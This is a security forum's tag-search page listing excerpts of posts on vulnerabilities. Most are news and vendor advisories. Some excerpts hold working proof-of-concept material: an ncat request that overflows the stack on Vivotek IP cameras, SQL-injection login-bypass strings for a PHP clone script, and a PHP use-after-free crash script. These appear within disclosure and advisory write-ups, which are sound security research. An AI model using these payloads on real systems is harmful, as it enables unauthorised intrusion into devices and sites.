Jump to content

Search the Community

Showing results for tags 'vulnerability'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Cumparaturi online's Test
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 107 results

  1. Many Vivotek IP cameras suffer from a remote stack overflow vulnerability. Device models include CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, and VC8101. [STX] Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis <mcw noemail eu> (September-October 2017) PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous (no credentials needed) Firmware Vulnerable: Only 2017 versions affected Firmware Patched: October 2017 and higher Device Model: CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more Download Updated Firmware: http://www.vivotek.com/firmware/ [Timeline] October 1, 2017: Reported findings with all details to Vivotek Cybersecurity October 2, 2017: First response from Vivotek October 5, 2017: ACK of findings from Vivotek October 11, 2017: Vivotek reported first fixed Firmware October 12, 2017: After request, Vivotek provided samples of fixed Firmware October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory November 1, 2017: Agreed on publication November 13, 2017 November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not. November 13, 2017: No reply from Vivotek, Full Disclosure as planned. [Details] Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek. The stack overflow is triggered by "PUT" or "POST" request: [PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n However, the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack: "[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request: "[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" Notes: 1. B to I = $R4-$R11; X = $PC 2. Size of request availible in $R3 at the LDMFD 3. Max request size: 9182 bytes (0x1FFF) 4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx) 5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes 6. Stack not protected with "Stack canaries" 7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a; 8. heap: Non-executable + Non-ASLR 9. stack: Non-executable + ASLR [PoC] $ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76eb2c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x75 117 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7e92dac0 0x7e92dac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) $ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76e82c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x4f 79 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7ec9cac0 0x7ec9cac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) Have a nice day /bashis [ETX] Source
  2. # Asterisk vulnerable to RTP Bleed - Authors: - Klaus-Peter Junghanns <kapejod () gmail com> - Sandro Gauci <sandro () enablesecurity com> - Vulnerable version: Asterisk 11.4.0 to 14.6.1 (fix incomplete) - References: AST-2017-005, CVE-2017-14099 - Advisory URL: <https://github.com/EnableSecurity/advisories/tree/master/ES2017-04-asterisk-rtp-bleed> - Timeline: - First report date: 2011-09-11 - Fix applied: [2011-09-21](https://issues.asterisk.org/jira/browse/ASTERISK-18587) - Issue apparently reintroduced: [2013-03-07](https://github.com/asterisk/asterisk/commit/80b8c2349c427a94a428670f1183bdc693936813) - New report date: 2017-05-17 - Vendor patch provided for testing: 2017-05-23 - Vendor advisory: 2017-08-31 - Enable Security advisory: 2017-08-31 ## Description When Asterisk is configured with the `nat=yes` and `strictrtp=yes` (on by default) options, it is vulnerable to an attack which we call RTP Bleed. Further information about the attack can be found at <https://rtpbleed.com>. ## Impact Abuse of this attack allows malicious users to inject and receive RTP streams of ongoing calls **without** needing to be positioned as man-in-the-middle. As a result, in the case of an RTP stream containing audio media, attackers can inject their own audio and receive audio being proxied through the Asterisk server. ## How to reproduce the issue The vulnerability can be exploited when a call is taking place and the RTP is being proxied. To exploit this issue, an attacker needs to send RTP packets to the Asterisk server on one of the ports allocated to receive RTP. When the target is vulnerable, the RTP proxy responds back to the attacker with RTP packets relayed from the other party. The payload of the RTP packets can then be decoded into audio. This issue can be reproduced by making use of [rtpnatscan](https://github.com/kapejod/rtpnatscan) (freely available) or [SIPVicious PRO](https://sipvicious.pro) (will be commercially available). ## Solutions and recommendations We have the following recommendations: - It is recommended to apply the fix issued by Asterisk which limits the window of vulnerability to the first few milliseconds. - When possible the `nat=yes` option should be avoided. - To protect against RTP injection the media streams should be encrypted (and authenticated) with SRTP. - A configuration option for SIP peers should be added that allows to prioritize RTP packets coming from the IP address learned through SIP signalling during the initial probation period. Note that as for the time of writing, the official Asterisk fix is vulnerable to a race condition. An attacker may continuously _spray_ an Asterisk server with RTP packets. This allows the attacker to send RTP within those first few packets and still exploit this vulnerability. The official Asterisk fix also does not properly validate very short RTCP packets (e.g. 4 octets, see [rtcpnatscan](https://github.com/kapejod/rtpnatscan) to reproduce the problem) resulting in an out of bounds read disabling SSRC matching. This makes Asterisk vulnerable to RTCP hijacking of **ongoing** calls. An attacker can extract RTCP sender reports containing the SSRCs of both RTP endpoints. A patch for this is available at (https://raw.githubusercontent.com/kapejod/rtpnatscan/master/patches/asterisk/too-short-rtcp-bugfix.diff) ## References - [Kamailio World 2017: Listening By Speaking - Security Attacks On Media Servers And RTP Relays](https://www.youtube.com/watch?v=cAia1owHy68) - [27C3: Having fun with RTP by Kapejod](https://www.youtube.com/watch?v=cp7VDRC-RcY) ## About Enable Security [Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers. ## Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Source: http://seclists.org/fulldisclosure/2017/Sep/9
  3. A highly critical vulnerability has been discovered in the Cisco Systems’ WebEx browser extension for Chrome and Firefox, for the second time in this year, which could allow attackers to remotely execute malicious code on a victim's computer. Cisco WebEx is a popular communication tool for online events, including meetings, webinars and video conferences that help users connect and collaborate with colleagues around the world. The extension has roughly 20 million active users. Discovered by Tavis Ormandy of Google Project Zero and Cris Neckar of Divergent Security, the remote code execution flaw (CVE-2017-6753) is due to a designing defect in the WebEx browser extension. To exploit the vulnerability, all an attacker need to do is trick victims into visiting a web page containing specially crafted malicious code through the browser with affected extension installed. Successful exploitation of this vulnerability could result in the attacker executing arbitrary code with the privileges of the affected browser and gaining control of the affected system. Cisco has already patched the vulnerability and released “Cisco WebEx Extension 1.0.12” update for Chrome and Firefox browsers that address this issue, though "there are no workarounds that address this vulnerability." Download Cisco WebEx Extension 1.0.12 Chrome Extensions Firefox Extension In general, users are always recommended to run all software as a non-privileged user in an effort to diminish the effects of a successful attack. Fortunately, Apple's Safari, Microsoft's Internet Explorer and Microsoft's Edge are not affected by this vulnerability. Cisco WebEx Productivity Tools, Cisco WebEx browser extensions for Mac or Linux, and Cisco WebEx on Microsoft Edge or Internet Explorer are not affected by the vulnerability, the company confirmed. The remote code execution vulnerability in Cisco WebEx extension has been discovered second time in this year. Ormandy alerted the networking giant to an RCE flaw in the WebEx browser extension earlier this year as well, which even led to Google and Mozilla temporarily removing the add-on from their stores. Via thehackernews.com
  4. Hi all, there is a website that I found where you can practice your website hacking skills. There are 50 vulnerabilities to be found, this website goes along with the courses from my previous course where I provide a URL with a plethora of courses The URL of this website: http://hackyourselffirst.troyhunt.com/ Good luck.
  5. buna poate ma lamureste si pe mine cineva cu se poate exploata vulnerabilitatea in jquery version 1.11.2 nu ma prea pricep prea bine la java si nu imi dau seama am tot citit pe google tot felul de articole dar le prea inteleg sau daca exista vreo aplicatie care o verifica automat daca este vulnerabil sa nu
  6. Systems Affected Microsoft Windows with Apple QuickTime installed Overview According to Trend Micro, Apple will no longer be providing security updates for QuickTime for Windows, leaving this software vulnerable to exploitation. [1] (link is external) Description All software products have a lifecycle. Apple will no longer be providing security updates for QuickTime for Windows. [1] (link is external) The Zero Day Initiative has issued advisories for two vulnerabilities found in QuickTime for Windows. [2] (link is external) [3] (link is external) Impact Computer systems running unsupported software are exposed to elevated cybersecurity dangers, such as increased risks of malicious attacks or electronic data loss. Exploitation of QuickTime for Windows vulnerabilities could allow remote attackers to take control of affected systems. Solution Computers running QuickTime for Windows will continue to work after support ends. However, using unsupported software may increase the risks from viruses and other security threats. Potential negative consequences include loss of confidentiality, integrity, or availability of data, as well as damage to system resources or business assets. The only mitigation available is to uninstall QuickTime for Windows. Users can find instructions for uninstalling QuickTime for Windows on the Apple Uninstall QuickTime (link is external) page. [4] References [1] Trend Micro - Urgent Call to Action: Uninstall QuickTime for Windows Today (link is external) [2] Zero Day Initiative Advisory ZDI 16-241: (0Day) Apple QuickTime moov Atom Heap Corruption Remote Code Execution Vulnerabilit (link is external) [3] Zero Day Initiative Advisory ZDI 16-242: (0Day) Apple QuickTime Atom Processing Heap Corruption Remote Code Execution Vulner (link is external) [4] Apple - Uninstall QuickTime 7 for Windows (link is external) SOURCE: https://www.us-cert.gov/ncas/alerts/TA16-105A
  7. sleed

    MailChimp

    Vendor: Mailchimp.com Type of Vuln.: XSS Stored Reported. PoC * :
  8. Just one day after Microsoft released its new operating system, over 14 Million Windows users upgraded their PCs to Windows 10. Of course, if you are one of the Millions, you should aware of Windows 10's Wi-Fi Sense feature that lets your friends automatically connects to your wireless network without providing the Wi-Fi password. Smells like a horrible Security Risk! It even triggered a firestorm among some security experts, who warned that Wi-Fi Sense is a terrible and dangerous feature and that you should disable it right away. Even some researchers advised Windows 10 users to rename their Wi-Fi access points. Before discussing the risks of Wi-Fi Sense, let's first know how it works. How Windows 10 Wi-Fi Sense works? Windows 10 Wi-Fi Sense feature allows you to share your Wi-Fi password with your friends or contacts, as well as lets you automatically connect to networks that your friends and acquaintances have connected to in past, even if you don't know the password. Now, when those friends are within the range of your Wi-Fi network, Windows 10 automatically joins the network with that saved password you just shared with your friends and logs them in, without prompting them for a password. Enabled by Default, but It's not the actual Security Threat, Here's Why: Wi-Fi Sense feature is enabled by default in Windows 10 to make it easier for users to receive instant access to the Shared Networks by their Friends or Contacts. But, But, But… did you notice that the feature says "For networks I select..."? "Enabled by default" doesn't mean your Wi-Fi passwords are automatically going to be shared with your Facebook or Skype contacts by default, unless you won’t manually configure your Wi-Fi Sense settings to share selected network access with any contact group. Under "For networks I select..." option, you can explicitly control which group of contacts from which social networks get access to which Wi-Fi Network. Until or unless you do not offer your Wi-Fi password to Wi-Fi Sense, it will not let selected contact group to connect to your network. This means Wi-Fi password sharing option is OFF for every social network by default. And of course even if you choose to share your Wi-Fi network with your contacts, Wi-Fi Sense only shares Internet access and not your actual Wi-Fi password. Why You Should be Scared of Wi-Fi Sense (Actual Security Threat) Microsoft promoted Wi-Fi sense as: In simple words, now you don't need to read out loud your Wi-Fi password, character by character when your friends are at your home and want to use The Internet. So similarly, you don’t need to shout across the office or your friend’s house "What’s the Wi-Fi password?" However: "If you choose to share with your Facebook friends, any of your Facebook friends who are using Wi-Fi Sense on a Windows Phone will be able to connect to the network you shared when it's in range, You can't pick and choose individual contacts." -- Microsoft FAQ says. As a general Internet user, I used to accept almost every friend request on the Facebook and also communicate with lots of people on Skype or Outlook. In short, the majority of people in my contact list are whom I don't know personally or trust. So, If I can't choose any individual contact from my list, then enabling "Network password sharing feature" will share my network access with all my contacts in the selected social network. Microsoft also Argued: Neither it allows anyone to access your local resources so that nobody can hunt through your personal files. However, We know that... The biggest threat of sharing your Wi-Fi access with everyone on a list is just like you are allowing hackers to position themselves between you and the connection point i.e. Man-in-the-Middle attack. In such attack scenarios, the hacker can access every piece of information you're sending out on the Internet, including important emails, account passwords or credit card information. Sitting on the same network, an attacker can also target your machine directly using Metasploit or any other hacking tool. Ultimately, Windows 10 Wi-Fi Sense probably is not the most secure feature in the world, but it is not that bad either, if in future, Microsoft could allow Windows 10 users to choose individual contacts from a group. For Now… Should You Stop Using It? Like many things in life, we have to make a choice between things that make our life comfortable and that provide us absolute security. AND, if you are concerned more about security, just turn Wi-Fi Sense OFF. How to Turn Windows 10 Wi-Fi Sense OFF? To disable Wi-Fi Sense, go to Windows Settings, then Network & Internet and then click "Change Wi-Fi settings," and then "Manage Wi-Fi settings." From there, you can change a variety of settings. Turn OFF everything under the Wi-Fi Sense heading; disable WI-Fi password sharing with Facebook, Outlook, or Skype; and have Wi-Fi Sense forget the list of known Wi-Fi networks. source: http://thehackernews.com/
  9. Remote code execution for some, denial of service for the rest of us Cisco has issued a string of patches for 16 faults including a fix for a possible remote code execution in its IOS and IOS XE routing software. The patches address a generous dollop of security conditions caused by faulty queued packets. One flaw, rated severity 8.3, allows attackers to gain remote code execution in IOS XE by sending a crafted packet that allows code to run on affected boxes. Attackers could also send crafted packets to trigger denial of service. "A vulnerability in the AppNav component of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload and may allow arbitrary code execution on the affected system," Cisco says in its advisory. "The vulnerability is due to improper processing of crafted TCP packets. An attacker could exploit this vulnerability by sending a crafted TCP packet that needs to be processed by the AppNav component configured on an affected device. An exploit could allow the attacker to cause an affected device to reload or execute arbitrary code in the forwarding engine." Another fix addresses flaws that allow attackers to spoof Autonomic Networking Registration Authority response thanks to lax message validation "A successful exploit could allow an attacker to bootstrap a device into an untrusted autonomic domain, gaining limited command and control of the AN node, causing a denial of service condition and disrupting access to the legitimate autonomic domain," Cisco says . Further vulnerabilities coupled in that advisory lead to denial of service conditions. The Borg also closed off a medium-severity vulnerability (CVE-2015-0769) in the IOS XR carrier software rated 5 can be easily exploited by attackers sending a packet that would thanks to IPv6 extension headers trigger denial of service. It says this occurs because the headers are not typical of normal operation and says there are no work-arounds for the flaw meaning affected systems will require the patch. "A vulnerability in the IP version 6 processing code of Cisco IOS XR Software for Cisco CRS-3 Carrier Routing System could allow an unauthenticated, remote attacker to trigger an ASIC scan of the Network Processor Unit and a reload of the line card processing an IPv6 packet," it says in an advisory. "The vulnerability is due to incorrect processing of an IPv6 packet carrying IPv6 extension headers that are valid but unlikely to be seen during normal operation. "An attacker could exploit this vulnerability by sending such an IPv6 packet to an affected device that is configured to process IPv6 traffic." That exploit can cause a reload of the line card triggering repeated denial of service through transit traffic or data destined for the device. Affected Cisco IOS XR versions include 4.0.1; 40.2; 4.0.3; 4.0.4; 4.1.0; 4.1.1; 4.1.2, and 4.2.0. IOS XR Release 4.2.1 and later are not affected. Source
  10. <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> | Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability | | Date: 06.13.2015 | | Exploit Daddy: Walid Naceri | | Vendor Homepage: http://milw0rm.sourceforge.net/ | | Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download | | Version: v1.0 | | Tested On: Kali Linux, Mac, Windows | |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| | Website exploiter: WwW.security-Dz.Com | | CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA | | Sorry: Sorry pancaker, you missed that one | <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ### vuln codez admin/login.php ### <? $usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing? $pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer? if($usr && $pwd){ $login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';"); $row = mysql_num_rows($login); ----Bla Bla Bla-------- ### manual ### Go to the login admin panel Exploit 1: USER: ADMIN' OR ''=' PASS: ADMIN' OR ''=' Exploit 2: USER: ADMIN' OR 1=1# PASS: Anything Bro ### How to fix, learn bro some php again ### $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr']))); $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd']))); Source
  11. Use-After-Free in PHP May 20, 2015 Advisory ID: HTB23262 Product: PHP Vendor: PHP Group Vulnerable Versions: 5.6.9 and probably prior Tested Version: 5.6.9 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Fix: June 2, 2015 Public Disclosure: June 10, 2015 Latest Update: June 9, 2015 Vulnerability Type: Use After Free [CWE-416] CVE Reference: Pending Risk Level: Medium CVSSv2 Base Score: 4.6 Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab Advisory Details: High-Tech Bridge Security Research Lab discovered use-after-free vulnerability in a popular programming language PHP, which can be exploited to cause crash and possibly execute arbitrary code on the target system. The vulnerability resides within the 'spl_heap_object_free_storage()' PHP function when trying to dereference already freed memory. A local attacker can cause segmentation fault or possibly execute arbitrary code on the target system with privileges of webserver. Below is a simple code that will trigger a crash: <?php class SplMinHeap1 extends SplMinHeap { public function compare($a, $ { return -parent::notexist($a, $; } } $h = new SplMinHeap1(); $h->insert(1); $h->insert(6); $h->insert(5); $h->insert(2); ?> Running the following PoC we get: gdb-peda$ r ~/Desktop/heap_uaf.php Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php PHP Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Program received signal SIGSEGV, Segmentation fault. [----------------------------------------------------------------------- ---registers-------------------------------------------------------------------- -------] RAX: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBX: 0x8000000 RCX: 0xcd0458 ("/home/test/De"...) RDX: 0x16f RSI: 0xcd0458 ("/home/test/De"...) RDI: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RSP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RIP: 0x82a96f (<zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10]) R8 : 0x269 R9 : 0x0 R10: 0x7fffffff9b20 --> 0x0 R11: 0x7ffff71102f0 --> 0xfffda6c0fffda3ef R12: 0x4209e0 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf30 --> 0x2 R14: 0x0 R15: 0x0 [-------------------------------------------------------------------------- ---code------------------------------------------------------------------------- ----] 0x82a964 <zval_delref_p+1>: mov rbp,rsp 0x82a967 <zval_delref_p+4>: mov QWORD PTR [rbp-0x8],rdi 0x82a96b <zval_delref_p+8>: mov rax,QWORD PTR [rbp-0x8] => 0x82a96f <zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10] 0x82a972 <zval_delref_p+15>: lea edx,[rax-0x1] 0x82a975 <zval_delref_p+18>: mov rax,QWORD PTR [rbp-0x8] 0x82a979 <zval_delref_p+22>: mov DWORD PTR [rax+0x10],edx 0x82a97c <zval_delref_p+25>: mov rax,QWORD PTR [rbp-0x8] [-------------------------------------------------------------------- --------stack------------------------------------------------------------------- ----------] As seen above when trying to dereference the value from $rax (which has been already freed) PHP crashes. Stopped reason: SIGSEGV 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 411 return --pz->refcount__gc; Running the backtrace command we can see a couple of freed variables: zval_ptr, pz gdb-peda$ bt #0 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 #1 0x000000000082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76 #2 0x000000000082bdcb in _zval_ptr_dtor (zval_ptr=0x7ffff7fcba88, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424 #3 0x00000000006e5c1a in spl_heap_object_free_storage (object=0x7ffff7dfdfa0) at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367 #4 0x000000000087f566 in zend_objects_store_free_object_storage (objects=0x102e640 <executor_globals+928>) at /home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97 #5 0x000000000082b89e in shutdown_executor () at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290 #6 0x0000000000841a4c in zend_deactivate () at /home/test/Desktop/php-5.6.9/Zend/zend.c:960 #7 0x00000000007a7c40 in php_request_shutdown (dummy=0x0) at /home/test/Desktop/php-5.6.9/main/main.c:1882 #8 0x00000000008f6501 in do_cli (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1177 #9 0x00000000008f6d8b in main (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1378 #10 0x00007ffff6faaec5 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #11 0x0000000000420a09 in _start () Lastly, from stack #2 we clearly see that the zval_ptr pointer (0x7ffff7fcba88) points to freed memory: gdb-peda$ x/50xw 0x7ffff7fcba88 0x7ffff7fcba88: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7 ffff7fcba98: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaa8: 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbab8: 0x5a5a5a5a 0x5a5a5a5a 0x5 a5a5a5a 0x5a5a5a5a 0x7ffff7fcbac8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbad8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbae8: 0x 5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaf8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb08: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5 a5a 0x7ffff7fcbb18: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb28 : 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb38: 0x5a5a5a5a 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb48: 0x5a5a5a5a 0x5a5a5a5a This vulnerability was successfully reproduced Ubuntu 14.04.1 LTS (32 bit and 64 bit) on the latest version of PHP 5.6.9. ImmuniWeb® On-Demand Web Application Penetration Test Solution: Apply Vendor's patch. More Information: https://bugs.php.net/bug.php?id=69737 72.52.91.13 Git - php-src.git/commit References: [1] High-Tech Bridge Advisory HTB23262 - https://www.htbridge.com/advisory/HTB23262 - Use-After-Free in PHP. [2] PHP - PHP: Hypertext Preprocessor - PHP is a popular general-purpose scripting language that is especially suited to web development. [3] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - a PCI compliant web application penetration test combined with managed vulnerability scan. Configure, schedule, and manage online 24/7. Source : https://www.htbridge.com/advisory/HTB23262
  12. Foxing the holes in the code Mozilla has more than doubled the cash rewards under its dusty bug bounty to beyond $10,000. The browser baron has increased the reward for high-severity bugs such as those leading to remote code execution without requiring other vulnerabilities. Engineer Raymond Forbes says the bounty had not been updated in five years and had fallen out of step. "The amount awarded was increased to $3000 five years ago and it is definitely time for this to be increased again," Forbes says. "We have dramatically increased the amount of money that a vulnerability is worth [and] we are moving to a variable payout based on the quality of the bug report, the severity of the bug, and how clearly the vulnerability can be exploited. "Finally, we looked into how we decide what vulnerability is worth a bounty award." Mozilla previously awarded $3000 for critical vulnerabilities that could seriously endanger users. It paid small amounts for only some moderate vulnerabilities that will under the revamp now attract up to $2000. The Firefox forger also launched its security bug hall of fame which is a common and important component of bug bounty programs, and will open a version for web and services. Bug bounties are enjoying a boom of late with many large organisations opening in-house and outsourced programs to attract security vulnerability researchers. The schemes promise to increase the security profile of organisations while providing hackers with an opportunity to practice their skills and earn cash or prizes without the threat of legal ramifications. Programs must be properly set up prior to launch including clear security policies and contact details posted to an organisation's web site, and 